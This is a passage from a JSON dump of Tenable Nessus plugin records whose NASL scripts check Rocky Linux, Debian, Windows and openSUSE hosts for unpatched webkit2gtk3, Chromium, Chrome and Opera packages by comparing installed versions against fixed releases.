rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:41:55", "description": "The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-26T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : webkit2gtk3 (RLSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174801", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2023:1919.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174801);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/26\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"RLSA\", value:\"2023:1919\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Rocky Linux 8 : webkit2gtk3 (RLSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2023:1919\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=2185724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-13T01:12:40", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5390 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-17T00:00:00", "type": "nessus", "title": "Debian DSA-5390-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5390.NASL", "href": "https://www.tenable.com/plugins/nessus/174397", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5390. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174397);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Debian DSA-5390-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5390\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2023/dsa-5390\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-2033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 112.0.5615.121-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '112.0.5615.121-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:37", "description": "The version of Google Chrome installed on the remote Windows host is prior to 112.0.5615.121. It is, therefore, affected by a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 112.0.5615.121 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-07-27T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_112_0_5615_121.NASL", "href": "https://www.tenable.com/plugins/nessus/174332", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174332);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/27\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Google Chrome < 112.0.5615.121 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 112.0.5615.121. It is, therefore, affected\nby a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1432210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 112.0.5615.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\nvar product_name = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Server 2012\" >< product_name)\n audit(AUDIT_OS_SP_NOT_VULN);\n\ngoogle_chrome_check_version(installs:installs, fix:'112.0.5615.121', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:09", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2022:10218-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-27T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10218-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-10218-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168203", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10218-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168203);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10218-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10218-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/AUXLEW4XOFSF5F25BFYCIF4VH46PGPXO/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?120995fe\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-93.0.4585.11-lp153.2.69.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:56:00", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2022:10219-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-27T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10219-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.4"], "id": "OPENSUSE-2022-10219-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168202", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10219-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168202);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10219-1)\");\n\n script_set_attribute(attribute:\"synopsis\", 